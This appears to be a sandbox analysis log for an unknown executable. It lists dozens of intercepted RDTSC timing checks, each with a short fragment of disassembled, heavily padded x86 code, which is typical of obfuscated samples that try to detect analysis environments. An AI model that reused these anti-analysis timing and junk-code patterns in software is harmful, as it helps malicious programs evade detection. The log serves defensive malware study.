Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C50AB3 second address: C50ACE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a mov bl, 05h 0x0000000c push 00000000h 0x0000000e mov edi, dword ptr [ebp+122D1BAAh] 0x00000014 xchg eax, esi 0x00000015 push eax 0x00000016 push edx 0x00000017 push ecx 0x00000018 pushad 0x00000019 popad 0x0000001a pop ecx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4FC96 second address: C4FCB4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7A49940186h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C50C44 second address: C50C48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C51BAE second address: C51BB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C51BB3 second address: C51BB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C51CB1 second address: C51D61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F7A49940178h 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 mov bx, EB32h 0x00000014 push dword ptr fs:[00000000h] 0x0000001b mov edi, dword ptr [ebp+122D28B0h] 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 push 00000000h 0x0000002a push eax 0x0000002b call 00007F7A49940178h 0x00000030 pop eax 0x00000031 mov dword ptr [esp+04h], eax 0x00000035 add dword ptr [esp+04h], 00000017h 0x0000003d inc eax 0x0000003e push eax 0x0000003f ret 0x00000040 pop eax 0x00000041 ret 0x00000042 add ebx, dword ptr [ebp+122D1AC4h] 0x00000048 mov ebx, 5CD8574Fh 0x0000004d mov eax, dword ptr [ebp+122D004Dh] 0x00000053 xor dword ptr [ebp+122D3839h], eax 0x00000059 push FFFFFFFFh 0x0000005b push 00000000h 0x0000005d push ebp 0x0000005e call 00007F7A49940178h 0x00000063 pop ebp 0x00000064 mov dword ptr [esp+04h], ebp 0x00000068 add dword ptr [esp+04h], 00000019h 0x00000070 inc ebp 0x00000071 push ebp 0x00000072 ret 0x00000073 pop ebp 0x00000074 ret 0x00000075 mov dword ptr [ebp+122D236Ch], edi 0x0000007b nop 0x0000007c ja 00007F7A49940185h 0x00000082 push eax 0x00000083 push eax 0x00000084 push edx 0x00000085 pushad 0x00000086 jmp 00007F7A4994017Bh 0x0000008b push eax 0x0000008c push edx 0x0000008d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C51D61 second address: C51D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C53B47 second address: C53B51 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7A49940176h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C56C10 second address: C56C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C56C14 second address: C56C1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C53D72 second address: C53D76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFB7AC second address: BFB7B2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C53D76 second address: C53D7C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C52C99 second address: C52C9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C54D53 second address: C54DE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A4900AE6Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push dword ptr fs:[00000000h] 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007F7A4900AE68h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D282Ah], ecx 0x00000033 jmp 00007F7A4900AE6Bh 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f adc di, ADBCh 0x00000044 mov eax, dword ptr [ebp+122D0A9Dh] 0x0000004a push 00000000h 0x0000004c push esi 0x0000004d call 00007F7A4900AE68h 0x00000052 pop esi 0x00000053 mov dword ptr [esp+04h], esi 0x00000057 add dword ptr [esp+04h], 0000001Bh 0x0000005f inc esi 0x00000060 push esi 0x00000061 ret 0x00000062 pop esi 0x00000063 ret 0x00000064 adc bh, FFFFFF9Eh 0x00000067 push FFFFFFFFh 0x00000069 xor bh, FFFFFF9Eh 0x0000006c nop 0x0000006d push eax 0x0000006e push edx 0x0000006f push eax 0x00000070 jno 00007F7A4900AE66h 0x00000076 pop eax 0x00000077 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFB7B2 second address: BFB7C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007F7A4994017Dh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFB7C9 second address: BFB7D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A4900AE6Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C53E41 second address: C53E45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C52D8F second address: C52DA5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F7A4900AE6Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFB7D7 second address: BFB7F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7A49940188h 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5A5EE second address: C5A5F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5C990 second address: C5C999 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5A5F3 second address: C5A5F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5CBA8 second address: C5CBAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C64474 second address: C6447E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F7A4900AE66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6447E second address: C64482 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C64482 second address: C64488 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C64488 second address: C64498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F7A49940176h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C64498 second address: C6449C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C63C0A second address: C63C2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F7A49940182h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007F7A49940176h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C63C2D second address: C63C4B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7A4900AE66h 0x00000008 jmp 00007F7A4900AE6Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnp 00007F7A4900AE7Fh 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C63C4B second address: C63C51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C63DAE second address: C63DB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C63DB2 second address: C63DEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F7A4994017Dh 0x0000000e pop eax 0x0000000f push ecx 0x00000010 jbe 00007F7A49940176h 0x00000016 pop ecx 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F7A4994017Fh 0x0000001f jnc 00007F7A49940178h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF6679 second address: BF667D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF667D second address: BF66BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7A49940180h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7A4994017Ch 0x00000012 jmp 00007F7A49940189h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF66BA second address: BF6704 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A4900AE70h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F7A4900AE6Dh 0x0000000e popad 0x0000000f jbe 00007F7A4900AE92h 0x00000015 push eax 0x00000016 jbe 00007F7A4900AE66h 0x0000001c jmp 00007F7A4900AE70h 0x00000021 pop eax 0x00000022 push eax 0x00000023 push edx 0x00000024 jc 00007F7A4900AE66h 0x0000002a push ebx 0x0000002b pop ebx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C09063 second address: C09074 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7A49940176h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C09074 second address: C0907D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0907D second address: C09081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C09081 second address: C09085 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6D5C4 second address: C6D5DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7A4994017Eh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6D5DA second address: C6D5E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6D5E0 second address: C6D5EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6D5EC second address: C6D607 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F7A4900AE72h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6D607 second address: C6D615 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push ecx 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6D615 second address: C6D64C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F7A4900AE72h 0x0000000f jl 00007F7A4900AE66h 0x00000015 popad 0x00000016 pushad 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 jg 00007F7A4900AE66h 0x0000001f popad 0x00000020 popad 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6D64C second address: C6D650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6D650 second address: C6D654 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6D654 second address: C6D65E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6D8BA second address: C6D8C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF9D4A second address: BF9D6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A4994017Ah 0x00000007 jmp 00007F7A4994017Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF9D6A second address: BF9D6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF9D6E second address: BF9D74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF9D74 second address: BF9D7B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7138F second address: C713AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F7A49940176h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7A4994017Fh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C713AD second address: C713B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7194A second address: C71965 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F7A49940186h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C71ACD second address: C71AD3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C71C59 second address: C71C5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C71C5D second address: C71C63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C71C63 second address: C71C8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F7A49940182h 0x0000000c ja 00007F7A49940176h 0x00000012 jp 00007F7A49940176h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C71DD4 second address: C71DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007F7A4900AE66h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C71DE1 second address: C71DE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFD38B second address: BFD391 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C77715 second address: C77722 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F7A4994017Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C778A9 second address: C778AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C779F1 second address: C779F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C77CD0 second address: C77CD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C77CD4 second address: C77CD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C77CD8 second address: C77CF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F7A4900AE70h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C77CF2 second address: C77CF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C77E8A second address: C77E8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C77E8E second address: C77EC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7A4994017Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F7A49940180h 0x00000019 jng 00007F7A49940176h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C77EC1 second address: C77EDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A4900AE79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C782D6 second address: C782DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C782DE second address: C782EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F7A4900AE66h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C782EB second address: C782F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C782F3 second address: C782FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7846F second address: C7848F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jno 00007F7A49940178h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jns 00007F7A49940176h 0x00000018 jg 00007F7A49940176h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7848F second address: C784B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A4900AE6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F7A4900AE6Fh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C784B3 second address: C784BB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C785F8 second address: C78612 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A4900AE70h 0x00000007 je 00007F7A4900AE66h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C78612 second address: C7861E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F7A49940176h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7861E second address: C78622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C78622 second address: C78626 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C25960 second address: C25967 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C78C41 second address: C78C45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C77421 second address: C77454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F7A4900AE73h 0x0000000b popad 0x0000000c jmp 00007F7A4900AE74h 0x00000011 pushad 0x00000012 push eax 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C03EB6 second address: C03EC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F7A49940176h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7C7B9 second address: C7C7CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F7A4900AE6Ch 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3EBBE second address: C3EBD0 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7A49940176h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F7A4994017Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3F1B7 second address: C3F1BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3F594 second address: C3F5A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
